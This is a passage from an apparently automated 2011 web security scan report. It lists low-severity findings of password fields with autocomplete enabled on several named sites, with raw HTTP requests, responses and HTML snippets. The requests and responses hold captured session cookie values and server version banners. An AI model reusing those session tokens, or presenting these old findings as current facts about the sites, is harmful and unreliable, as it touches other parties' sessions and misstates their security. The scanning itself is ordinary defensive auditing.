The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 20:28:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-UA-Compatible: IE=EmulateIE8
Vary: Accept-Encoding
Set-Cookie: tcc=one; path=/
Set-Cookie: abtest_v=version&7&site_wide&adsenseurl.i; path=/
Set-Cookie: member_session=UmFuZG9tSVal7bOT1aWDpS%5BS%5DYHa5elnas1i8FyBu96eHtVxkOzSTAkYqzjbSyN6kyrcEkolEXnIov%5BP%5DNQYJYwp%5BS%5DMR6GmN4JVJGCLWShxUnyRxM1JKLnGsJd%5BP%5DpEQmd2FxR9dBmv0oSQZzlWRLhK63xHsXj2od2mdXI9abrzBxwNryHqU4tFdM5CCpZcqKp53DjBiaE0oTZl76SyA%5BP%5DVWmV%5BP%5Dl6bCbl6JiVFizfhvyNBHxuZJB7Ei7%5BP%5DhAk2cupNjp84JqLXZhVliop9Z5T9YZqAvHxiw%5BE%5D%5BE%5D; domain=.manta.com; path=/; expires=Sat, 05-Mar-2011 20:28:14 GMT
Set-Cookie: refer_id=0000; domain=.manta.com; path=/
Set-Cookie: refer_id_persistent=0000; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:14 GMT
Set-Cookie: cust_id=1296764894.813410-573; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:14 GMT
Via: 1.0 www.manta.com
Content-Length: 52971
X-Varnish: 1811565262
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Abc Development In
...[SNIP]...
<div class="form-login">                    <form action="https://www.manta.com/member/login/" method="post" id="top_login_form">
                   <fieldset>
...[SNIP]...
<span><input id="password" name="password" title="password" type="password" class="top_login_password" /></span>
...[SNIP]...

14.36. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sfweekly.com
Path:   /2010-08-11/news/ihelp-for-autism/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2010-08-11/news/ihelp-for-autism/ HTTP/1.1
Host: www.sfweekly.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d Zend Core/2.5.0 PHP/5.2.4
X-Powered-By: Zend Core/2.5.0 PHP/5.2.4
Cache-Control: public, max-age=900, s-maxage=900
Pragma: cache
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Age: 57
Date: Thu, 03 Feb 2011 17:54:17 GMT
Expires: Thu, 03 Feb 2011 18:08:20 GMT
Content-Length: 263362
Connection: close


<!doctype html public "-//w3c//dtd html 4.01 transitional//en" "http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta name='google-site-verification' content='JJc5K-OyKVMz5QCREOmr5SX-rsF
...[SNIP]...
<div id="login">
<form method="post" action="/readers/login/">
<div style="float: left">
...[SNIP]...
<br />
<input id="ReaderPassword" tabindex="2" class="password" type="password" name="data[Reader][password]"/>
<input tabindex="3" class="submit" type="submit" value="Login" />
...[SNIP]...

14.37. http://www.supertradeexchange.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supertradeexchange.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.supertradeexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13237
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/
Date: Thu, 03 Feb 2011 19:35:26 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>SuperTradeExchange&reg; - a small business community and barter netwo
...[SNIP]...
</h3>
       <form name="SignIn" action="/acct/login.asp" method="post" onkeyup="eval_button(event, this)">
       <label for="login">
...[SNIP]...
</label>
       <input type="password" name="pwd" id="pwd"><br>
...[SNIP]...

14.38. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefutoncritic.com
Path:   /devwatch/wright-vs-wrong/x22

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /devwatch/wright-vs-wrong/x22 HTTP/1.1
Host: www.thefutoncritic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:43 GMT
Connection: close
Content-Length: 20828

<html>
<head>
<title>Shows A-Z - wright vs wrong on abc | TheFutonCritic.com</title>
<meta id="Meta_Description" name="Description" content="wright vs wrong on abc ... TheFutonCritic.com has wright
...[SNIP]...
<td>

           <form name="login" method="post" action="/myfuton.aspx">
               <div align="right">
...[SNIP]...
<img src="/images/password.gif" border="0"> <input name="password" type="password" size="10" value="">
                   <input type="submit" value="sign in!">
...[SNIP]...

14.39. http://www.tucows.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.40. http://www.tucows.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.41. http://www.tucows.com/about.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.42. http://www.tucows.com/about.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.43. http://www.tucows.com/advertise.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.44. http://www.tucows.com/advertise.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.45. http://www.tucows.com/affiliate/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.46. http://www.tucows.com/affiliate/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.47. http://www.tucows.com/author_ratings.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.48. http://www.tucows.com/author_ratings.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

14.49. http://www.tucows.com/contact.html  previous  next

Summary

